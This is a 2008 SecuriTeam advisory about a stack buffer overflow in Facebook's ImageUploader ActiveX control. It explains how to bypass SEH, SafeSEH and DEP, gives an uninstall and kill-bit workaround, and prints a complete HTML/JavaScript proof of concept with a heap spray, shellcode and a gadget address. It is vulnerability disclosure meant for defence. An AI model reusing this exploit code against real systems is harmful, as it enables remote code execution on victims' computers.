[NT] FaceBook ImageUploader OCX Stack Buffer Overflow Vulnerability
- From: SecuriTeam <support@xxxxxxxxxxxxxx>
- Date: 13 Feb 2008 13:48:01 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
FaceBook ImageUploader OCX Stack Buffer Overflow Vulnerability
------------------------------------------------------------------------
SUMMARY
FaceBook is the world's largest Social Network. It has about 60 million
users. MC Group has discovered a critical vulnerability in FaceBook's
Image Uploader. The vulnerability allows a remote attacker to reliably
overwrite the entire stack, overwriting the SEH handler and to execute
arbitrary code in the context of the user who executed Internet Explorer.
DETAILS
Vulnerable Systems:
* FaceBook Image Uploader version 5.0.14.0
When assigning a value to any string type attribute of the ImageUploader
class, the value is copied into a fixed size buffer on the stack. As there
is no length validation imposed prior to the copying function, the
stack-based buffer can be overflowed by whatever is passed into the
attribute.
The "ImageUploader4.1.OCX" module is compiled with the "/GS" flag,
therefore there is a security cookie protection. This protection can be
bypassed by overwriting the SEH handler.
On XP SP2 systems, *Almost* all modules used by Internet Explorer are
compiled with SafeSEH, therefore to exploit the vulnerability an unsecured
module must be used, such as LPK.DLL. It is also possible to bypass the
protection of systems with non executable stack by using the classic
return to libc method returning into VirtualProtect.
To achieve exploitation across all versions of windows, it is possible to
"Spray" the heap and jump to a constant chosen address. Using this method
an attacker will not execute code on systems with Software DEP enabled on
iexplore.exe.
Workaround:
To work around this vulnerability, if you are not actively using
FaceBook's Image Uploader you can execute the command-line to uninstall
the ActiveX:
"regsvr32 /u %windir%\downlo~1\ImageUploader4.1.OCX"
Or by turning on the KillBit at (so the ActiveX cannot be created under
Internet Explorer)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX
Compatibility\{5C6698D9-7BE4-4122-8EC5-291D84DBD4A0}
"Compatibility Flags"=DWORD:0x400
By Un-Registering this ActiveX, Uploading files to FaceBook using the
Image Uploader will not be possible, thereby mitigation this
vulnerability.
Proof Of Concept:
<html> - http://www.Mc-Grp.biz/security/facebook/poc.htm
<head>
<object id="target"
classid="clsid:5C6698D9-7BE4-4122-8EC5-291D84DBD4A0"></object>
</head>
<body>
<script>
var shellcode = unescape("%u0D0D%u0D0D%u9090%u9090"+ //Windows Execute
Command (calc)
"%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b"+
"%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca"+
"%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b"+
"%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%uc031%u8b64%u3040"+
"%uc085%u0c78%u408b%u8b0c%u1c70%u8bad%u0868%u09eb%u808b%u00b0"+
"%u0000%u688b%u5f3c%uf631%u5660%uf889%uc083%u507b%uf068%u048a"+
"%u685f%ufe98%u0e8a%uff57%u63e7%u6c61%u0063");
var address = 0x0d0d0d0d;
var block_size = 0x400000;
var blocks = (address - block_size) / block_size;
var spray = unescape("%u0D0D%u0D0D");
var tmp = unescape("%u0D0D%u0D0D");
var tmp_size = 1044;
while((spray.length * 2) < block_size) spray += spray;
spray = spray.substring(0, block_size - shellcode.length);
memory = new Array();
for(i = 0; i < blocks; i++) memory[i] = spray + shellcode;
while(tmp.length < (tmp_size * 2)) tmp += tmp;
tmp = tmp.substring(0, tmp_size);
var size = 131;
var z = Array(size);
for (i=0; i<size; i++) {
z[i] = unescape("%u0d0d%u0d0d");
}
var size = 131;
var z2 = Array(size);
for (i=0; i<size; i++) {
z2[i] = unescape("%u0d0d%u0d0d");
}
//' 0x7c914ff1 pop esi, pop ebp, retn 14 lpk.dll NO SAFE SEH
target.FileMask=z.join('') + unescape("%uebFF%uebFF") +
unescape("%u4ff1%u7c91") + z2.join('') + z2.join('') + z2.join('') +
z2.join('') + z2.join('') + z2.join('') + z2.join('') + z2.join('') +
z2.join('') + z2.join('') + z2.join('') + z2.join('') + z2.join('') +
z2.join('') + tmp.substr(0,1) // + String(2000, unescape("%uffff"))
</script>
</HTML>
ADDITIONAL INFORMATION
The information has been provided by Rafel Ivgi, "The-Insider".
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Prev by Date: [NT] Microsoft Office Works Converter Stack-based Buffer Overflow Vulnerability
- Next by Date: [NT] Vulnerability in WebDAV Mini-Redirector Allows Code Execution (MS08-007)
- Previous by thread: [NT] Microsoft Office Works Converter Stack-based Buffer Overflow Vulnerability
- Next by thread: [NT] Vulnerability in WebDAV Mini-Redirector Allows Code Execution (MS08-007)
- Index(es):
Relevant Pages
|
|
